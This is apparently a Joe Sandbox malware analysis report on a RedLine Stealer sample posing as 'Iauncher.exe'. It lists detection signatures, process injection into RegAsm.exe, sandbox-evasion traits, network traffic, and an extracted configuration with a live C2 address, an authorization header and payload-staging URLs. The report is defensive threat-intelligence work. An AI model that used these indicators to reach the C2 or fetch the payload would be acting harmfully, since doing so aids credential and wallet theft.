Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Iauncher.exe

Overview

General Information

Sample name:Iauncher.exe
Analysis ID:1434866
MD5:e69feb7fd40f408a088d879be323f37a
SHA1:0f71fa75df6795c43c69e7ec5689c995c135079e
SHA256:463dd34a95d86ca5d08059f1ec80d3b00d3bbabdc74936025b7e30ef2b3ee931
Tags:exe
Infos:

Detection

RedLine
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected RedLine Stealer
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Iauncher.exe (PID: 6692 cmdline: "C:\Users\user\Desktop\Iauncher.exe" MD5: E69FEB7FD40F408A088D879BE323F37A)
    • Iauncher.exe (PID: 7256 cmdline: "C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe" MD5: D79977A15EB010C637CF9078B4EB82C8)
      • conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 7324 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": "147.45.47.65:47232", "Bot Id": "\ueb45", "Authorization Header": "a6a58668f69a7e8a13c2ff0e52c1d284"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Iauncher.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000D.00000002.1431945457.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000000.00000000.1184729227.0000000000592000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                Click to see the 5 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                11.2.Iauncher.exe.590030.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.0.Iauncher.exe.590000.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    13.2.RegAsm.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      11.2.Iauncher.exe.590030.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        0.2.Iauncher.exe.3ef1a10.6.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                          Click to see the 2 entries

                          Sigma Signatures

                          No Sigma rule has matched

                          Snort Signatures

                          Timestamp:05/01/24-20:35:54.029434
                          SID:2043234
                          Source Port:47232
                          Destination Port:49711
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:05/01/24-20:35:53.101816
                          SID:2046045
                          Source Port:49711
                          Destination Port:47232
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:05/01/24-20:36:00.399690
                          SID:2046056
                          Source Port:47232
                          Destination Port:49711
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:05/01/24-20:36:05.641411
                          SID:2043231
                          Source Port:49711
                          Destination Port:47232
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Found malware configuration
                          Source: 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "147.45.47.65:47232", "Bot Id": "\ueb45", "Authorization Header": "a6a58668f69a7e8a13c2ff0e52c1d284"}
                          Multi AV Scanner detection for submitted file
                          Source: Iauncher.exeReversingLabs: Detection: 23%
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: Iauncher.exeJoe Sandbox ML: detected
                          Source: Iauncher.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 193.109.246.100:443 -> 192.168.2.7:49699 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.202.98:443 -> 192.168.2.7:49710 version: TLS 1.2
                          Source: Iauncher.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdbBSJB source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed source: Iauncher.exe
                          Source: Binary string: costura.costura.pdb.compressedlB source: Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.costura.pdb.compressed source: Iauncher.exe
                          Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: Iauncher.exe
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdb source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_0057960E FindFirstFileExW,11_2_0057960E
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_05D6A940
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_05DB7908
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_05DB78F8
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_05DB7A41
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09BFEE6Ah0_2_09BFE858
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then inc dword ptr [ebp-10h]0_2_09BFE858
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09BF7FE1h0_2_09BF7BA0
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_09BF8F3F
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_09BF00E8
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09BF279Bh0_2_09BF2550
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09BF279Bh0_2_09BF2550
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09BF279Bh0_2_09BF253F
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09CAE48Ah0_2_09CA9CFC
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09CAB589h0_2_09CA9C54
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09CABCC4h0_2_09CA9C54
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09CAC257h0_2_09CA9C54
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09CADC32h0_2_09CADAF0
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09CABCC4h0_2_09CAB081
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09CAE48Ah0_2_09CADC49
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09CA158Dh0_2_09CA0040
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea eax, dword ptr [ebp-000000ACh]0_2_09CA0040
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_09CA0040
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09CA158Dh0_2_09CA0021

                          Networking

                          barindex
                          Snort IDS alert for network traffic
                          Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.7:49711 -> 147.45.47.65:47232
                          Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.7:49711 -> 147.45.47.65:47232
                          Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 147.45.47.65:47232 -> 192.168.2.7:49711
                          Source: TrafficSnort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 147.45.47.65:47232 -> 192.168.2.7:49711
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: 147.45.47.65:47232
                          Yara detected Generic Downloader
                          Source: Yara matchFile source: 0.2.Iauncher.exe.3ef1a10.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Iauncher.exe.5c10000.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: global trafficTCP traffic: 192.168.2.7:49711 -> 147.45.47.65:47232
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/z-Closing.txt HTTP/1.1Host: antiloxss.usite.proConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/hwid.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/hwids.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildName.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /Iauncher.zip HTTP/1.1Host: gitgo.orgConnection: Keep-Alive
                          Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/z-Closing.txt HTTP/1.1Host: antiloxss.usite.proConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/hwid.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/hwids.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildName.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /Iauncher.zip HTTP/1.1Host: gitgo.orgConnection: Keep-Alive
                          Source: Iauncher.exe, 00000000.00000002.3682596392.00000000055B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: CLIENT_VERSIONthttp://gdata.youtube.com/feeds/api/videos/{0}?v=2&alt=jsonDFailed to get youtube video data: Lhttp://vimeo.com/api/v2/video/{0}.json@Failed to get vimeo video data: ork Manager.<br><br> <b>LICENSE MODULE</b><br> The license module enables you to work without interruptions. Issues with the module can be caused by:<br><br> (i) <i>Framework Manager is not installed</i><br>(ii) <i>HDD formatting</i><br>(iii) <i>OS reintallation</i>,<br>(iv) <i>Siticone Files Deletion</i>, or<br>(v) <i>Any other issues</i>.<br><br> For assistance, please contact our support centre at: <i>support@siticoneframework.com</i>PMissing Manager or the Module is corrupt4Download Framework Manager4Contact Our Support CentreHmailto:support@siticoneframework.comDhttps://www.siticoneframework.com/ equals www.youtube.com (Youtube)
                          Source: global trafficDNS traffic detected: DNS query: antiloxss.usite.pro
                          Source: global trafficDNS traffic detected: DNS query: google.com
                          Source: global trafficDNS traffic detected: DNS query: gitgo.org
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://antiloxss.usite.pro
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://antiloxss.usite.prod
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3674975399.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3674975399.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3674975399.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002ACA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gdata.youtube.com/feeds/api/videos/
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gitgo.org
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gitgo.orgd
                          Source: RegAsm.exe, 0000000D.00000002.1436552204.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adp/1.0/
                          Source: RegAsm.exe, 0000000D.00000002.1436552204.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.microsofo/1.2/
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3674975399.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
